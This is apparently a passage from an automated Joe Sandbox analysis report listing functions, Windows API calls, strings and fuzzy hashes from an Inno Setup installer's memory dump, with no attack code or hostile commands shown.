Function 00471D7C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,00471FF2,00000000,00472008,?,?,?,?,00000000,?,0048A00F), ref: 00471DCE

Strings

RegisteredOwner, xrefs: 00471DAB
RegisteredOrganization, xrefs: 00471DBD

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3513276378-1113070880
Opcode ID: dc05276a867758ad81d07b72ee8a5d4e484fc6874cae0e0d7aca52102206a260
Instruction ID: 8fc1018621d838178f304ddf61fa62f48c71e0651657994db2425d214e1c5cfd
Opcode Fuzzy Hash: dc05276a867758ad81d07b72ee8a5d4e484fc6874cae0e0d7aca52102206a260
Instruction Fuzzy Hash: A8F0A735B0814867CB00E6A6DD53B9E33A9DB45304F50807BA1049B251D6B9FE00CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0046CCF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CE7D), ref: 0046CD19
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CE7D), ref: 0046CD30

Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68

Strings

CreateFile, xrefs: 0046CD25

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID: CreateFile
API String ID: 918212764-823142352
Opcode ID: 3680ab04b98c7e682a5ea15e78cc49168d68a7200676f9f33bd99848e270dfb8
Instruction ID: 76e8e47a53df292ffdc7bea0b17f0be981d9ce437e069099ed8f64ea5dbc2dde
Opcode Fuzzy Hash: 3680ab04b98c7e682a5ea15e78cc49168d68a7200676f9f33bd99848e270dfb8
Instruction Fuzzy Hash: 9CE0ED70340304AFE610A769DCC6F6A7B989B04778F108165FA84AF3E2D5B9ED44865D

Uniqueness

Uniqueness Score: -1.00%

Function 004063F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32 ref: 0040641D

Strings

D7B, xrefs: 00406400, 00406403
TApplication, xrefs: 0040641A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CreateWindow
String ID: D7B$TApplication
API String ID: 716092398-3833581397
Opcode ID: 85b28a6e909be971fa5c2b10f844aa2cfc1bbfc1f3ab945af7c68de878036d31
Instruction ID: 6f7591f20c68b61a58661acfffb9a3df5edb7f64d2e420099b873233bc7ca4e0
Opcode Fuzzy Hash: 85b28a6e909be971fa5c2b10f844aa2cfc1bbfc1f3ab945af7c68de878036d31
Instruction Fuzzy Hash: FEE002F2204309BFDB00DE8ADCC1DABB7ACFB4C654F844105BB1C972428275AC608B71

Uniqueness

Uniqueness Score: -1.00%

Function 00467A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

6CAD68C0.ADVAPI32(?,NoModify,00000000,00000004,dJ,00000004,00000001,?,00467ED2,?,?,00000000,00467F5F,?,_is1,00000001), ref: 00467A53

Strings

NoModify, xrefs: 00467A51
dJ, xrefs: 00467A49, 00467A4C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID: NoModify$dJ
API String ID: 0-800172441
Opcode ID: 46b5fa948e778dcbe85151809d4e98f2a700c8705d486d4da5e9f2fb0ba61360
Instruction ID: 05bad810163c4ceb778b5726a376390f895694160466141ca5b05c7ce2be41b6
Opcode Fuzzy Hash: 46b5fa948e778dcbe85151809d4e98f2a700c8705d486d4da5e9f2fb0ba61360
Instruction Fuzzy Hash: DBE04FB4604304BFEB04DBA5CD4AF6B77ACDB48724F104059BA089B390E674FE40C668

Uniqueness

Uniqueness Score: -1.00%

Function 0045A780 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045A86E

Strings

LzmaDecoderInit failed (%d), xrefs: 0045A8E0
-, xrefs: 0045A811

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: AllocVirtual
String ID: -$LzmaDecoderInit failed (%d)
API String ID: 4275171209-4285503710
Opcode ID: 2337044e03c035ba93b57a1ab65d48600398ba90547c165009fdbdc3351e9445
Instruction ID: ce92a4b14172b7b8f146cae1f667dbe7964f9d3ccef1d9495d5c0d533edb85f3
Opcode Fuzzy Hash: 2337044e03c035ba93b57a1ab65d48600398ba90547c165009fdbdc3351e9445
Instruction Fuzzy Hash: A6519170A042089FDB00DFA9C44579EBBB4EF08305F1442AAE904E7243D778DD5A8B5A

Uniqueness

Uniqueness Score: -1.00%

Function 004244C4 Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004244DA
TranslateMessage.USER32(?), ref: 00424557
DispatchMessageA.USER32 ref: 00424561

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: a3864dcb05f7fa3a1ae4aaac3fcf3cfd287155588397a3feda0b4a1d612d8563
Instruction ID: 50ce2c9e70e4eaae550d78c07e9c46089a6dadb1d18dfb0cfc0e9111bdecdfbf
Opcode Fuzzy Hash: a3864dcb05f7fa3a1ae4aaac3fcf3cfd287155588397a3feda0b4a1d612d8563
Instruction Fuzzy Hash: 501154303043206BDA21E664A94179B73D4DFC5B48F80481EFAC997382D7BDDD859B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041670C Relevance: 4.5, APIs: 3, Instructions: 39COMMON

Download Yara Rule

APIs

SetPropA.USER32 ref: 00416732
SetPropA.USER32 ref: 00416747
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041676E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Prop$Window
String ID:
API String ID: 3363284559-0
Opcode ID: dcfb28db4e21e1347727ab6fef254df2d5c6776ae7acbe9f9cc92ac1cf30ba34
Instruction ID: 51db7ca5a9fce4f0319e037eda000c89f68284c9b22635f91d1590f0371f096d
Opcode Fuzzy Hash: dcfb28db4e21e1347727ab6fef254df2d5c6776ae7acbe9f9cc92ac1cf30ba34
Instruction Fuzzy Hash: 9AF0B271702210ABD710AF599C85FA632DCAB09719F1505BABD08EF2D6C679DC4487A8

Uniqueness

Uniqueness Score: -1.00%

Function 00477240 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 004772DA

Strings

InitializeWizard, xrefs: 00477287

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ActiveWindow
String ID: InitializeWizard
API String ID: 2558294473-2356795471
Opcode ID: 8f5aa8ab210abca25a3b561bd254279c72b8fe58534d7761e8805a32d80afa36
Instruction ID: b02ce51899e4cb3563328e529591e4cf6ff4720998866f6c619a7b5757ff9684
Opcode Fuzzy Hash: 8f5aa8ab210abca25a3b561bd254279c72b8fe58534d7761e8805a32d80afa36
Instruction Fuzzy Hash: 0811C23160C2449FD711EBA9EC52B9A3B98E74A324F6044BBF41983AA1E6396800C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00471C98 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,00471ECE,00000000,00472008), ref: 00471CDD

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00471CAD

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 3513276378-1019749484
Opcode ID: 58e33d0b3820e3d3276818e37a665b85ca4aef660687782bc27ab43273ace938
Instruction ID: 49f62564b5c020d95f3bf380884e2fac3a6e22930ca8c995e06027c69e75b900
Opcode Fuzzy Hash: 58e33d0b3820e3d3276818e37a665b85ca4aef660687782bc27ab43273ace938
Instruction Fuzzy Hash: 70F027327441247BDA04A1EF6C42BEEA29CDF84718F20403BF509DB362D9BADE01936C

Uniqueness

Uniqueness Score: -1.00%

Function 004679D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

6CAD68C0.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,004AE064,?,00467B63,?,00000000,00467F5F,?,_is1), ref: 004679F3

Strings

Inno Setup: Setup Version, xrefs: 004679F1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID: Inno Setup: Setup Version
API String ID: 0-4166306022
Opcode ID: 74786683835a296d1d2ef93f169cd4d7b2021a1ac276dbafc591dab8d48098fa
Instruction ID: 7b6352c98c09a79ccde8b08551028820b2906c7e57d218ecf09e1c460de49617
Opcode Fuzzy Hash: 74786683835a296d1d2ef93f169cd4d7b2021a1ac276dbafc591dab8d48098fa
Instruction Fuzzy Hash: F3E065713012047BD710AA6A9C89F5BB6DCDF887A4F00447AB90CDB352D575DD408568

Uniqueness

Uniqueness Score: -1.00%

Function 0042DCB4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042DCCE

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D6790
String ID: System\CurrentControlSet\Control\Windows
API String ID: 3077103850-1109719901
Opcode ID: aa21068e09dffa96e85b39163423caf07922cc031927357f26d27300ba816339
Instruction ID: 252469d4665b97d1cf586433f62e7af82fe31e26ad1ddc23bb3c89940e80562f
Opcode Fuzzy Hash: aa21068e09dffa96e85b39163423caf07922cc031927357f26d27300ba816339
Instruction Fuzzy Hash: 39D0C7729101287BDB109A89DC41DF7775DDB59360F444016FD0497200C1B4ED5187F4

Uniqueness

Uniqueness Score: -1.00%

Function 00402090 Relevance: 3.1, APIs: 2, Instructions: 122COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0048D420,00000000,00402204), ref: 004020D3

Part of subcall function 004019D4: RtlInitializeCriticalSection.KERNEL32(0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019EA
Part of subcall function 004019D4: RtlEnterCriticalSection.KERNEL32(0048D420,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019FD
Part of subcall function 004019D4: LocalAlloc.KERNEL32(00000000,00000FF8,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A27
Part of subcall function 004019D4: RtlLeaveCriticalSection.KERNEL32(0048D420,00401A91,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A84

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID:
API String ID: 296031713-0
Opcode ID: 853685f3dbed9f38c53037365cb2640759140303a7593ac019a6f2320df6d27e
Instruction ID: efce3ed5edfca4bdd6d7588905b72773811f0370f718a470ac866a0653614aae
Opcode Fuzzy Hash: 853685f3dbed9f38c53037365cb2640759140303a7593ac019a6f2320df6d27e
Instruction Fuzzy Hash: CC41CFB2E023049FE720CF69DD8561DBBA0FB54728B15467ED844A77E2D378AC42CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0042DAB0 Relevance: 3.1, APIs: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,0042E470,00000000,00000000,00000000,?,00000000,0042DBD1,?,?,00000000,00000000), ref: 0042DAE8
RegQueryValueExA.ADVAPI32(?,0042E470,00000000,00000000,00000000,00000000,?,0042E470,00000000,00000000,00000000,?,00000000,0042DBD1), ref: 0042DB40

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8e3b2a71cf41163fc7a0db4ba73d3df46e8db2e3b4fe39bd15de565b3d8b0fe0
Instruction ID: 0e7576e286cf79993513e01da67dc7455a51607c0b1d4e8bc5d861b2dca46959
Opcode Fuzzy Hash: 8e3b2a71cf41163fc7a0db4ba73d3df46e8db2e3b4fe39bd15de565b3d8b0fe0
Instruction Fuzzy Hash: 22410D70E00118BFDB21DF95D891BEFBBB8EF05314F9585A6E810A7290D738BA44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD58 Relevance: 3.1, APIs: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegEnumKeyExA.ADVAPI32 ref: 0042DDEC
RegCloseKey.ADVAPI32(?,0042DE5D,?,00000000,00000000,00000000,00000000,00000000,0042DE56,?,?,00000008,00000000,00000000,0042DE83), ref: 0042DE50

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD6790Enum
String ID:
API String ID: 3529925450-0
Opcode ID: 8afd54fa5afda933115ccd3b0db7f41e9d14088c8f5b5d7f941e79e5460edd25
Instruction ID: 5e4b05f4a3e0476540ac301d5f1dac6772fd0ae46009fb461a6a6db6e0667857
Opcode Fuzzy Hash: 8afd54fa5afda933115ccd3b0db7f41e9d14088c8f5b5d7f941e79e5460edd25
Instruction Fuzzy Hash: E2319370F04618AEDB10EFA1DC52BBFB7B9EB48744F91447AE500F7281D6389A01CA29

Uniqueness

Uniqueness Score: -1.00%

Function 0045179C Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

6CAD6060.KERNEL32(00000000,00000000,00000000,00451804), ref: 004517DE
GetLastError.KERNEL32(00000000,00000000,00000000,00451804), ref: 004517E6

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D6060ErrorLast
String ID:
API String ID: 581812409-0
Opcode ID: 2e3c7a9707636af3bcdad6923f18bb4592bde806625197659ce5a4d4f60f9180
Instruction ID: 1f8f1ae2a19b5dd98b784e482048326263c3535bd956013154575bb21478434f
Opcode Fuzzy Hash: 2e3c7a9707636af3bcdad6923f18bb4592bde806625197659ce5a4d4f60f9180
Instruction Fuzzy Hash: 7F01F972B04608ABCB10EF7A9C4159EB7ECDB4975675046BBFC04E3752EB385E0485AC

Uniqueness

Uniqueness Score: -1.00%

Function 00451324 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451383), ref: 0045135D
GetLastError.KERNEL32(00000000,00000000,00000000,00451383), ref: 00451365

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 833f21c5392796a44ebcff5dc203d3b36506b61773b1d3d31a3e99eac73e82e2
Instruction ID: 27d3de9a8ed551c2def9e0a30266f883e75579bda74dad919e0820e1c2d818b9
Opcode Fuzzy Hash: 833f21c5392796a44ebcff5dc203d3b36506b61773b1d3d31a3e99eac73e82e2
Instruction Fuzzy Hash: E4F02872A04704BBDB00EFB59C51A9EB7E8DB08711F1046BBFC04E3A92E77D5E048598

Uniqueness

Uniqueness Score: -1.00%

Function 00423304 Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

LoadCursorA.USER32 ref: 00423311
LoadCursorA.USER32 ref: 0042333B

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: 347c0409319e1f56965bdb416625521c8f9c73e06cce4d6ef72b792233170026
Instruction ID: 22188b5ea9937349a3dfd8468704a85441daf04a531a8cd34321fb41e475eefe
Opcode Fuzzy Hash: 347c0409319e1f56965bdb416625521c8f9c73e06cce4d6ef72b792233170026
Instruction Fuzzy Hash: ACF0AE21B001506A96109D3D5CC192A72A4DB853357A1033BFD3AC72D1CE2D5E415299

Uniqueness

Uniqueness Score: -1.00%

Function 0042E250 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042E25A
LoadLibraryA.KERNEL32(00000000,00000000,0042E2A4,?,00000000,0042E2C2,?,00008000), ref: 0042E289

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
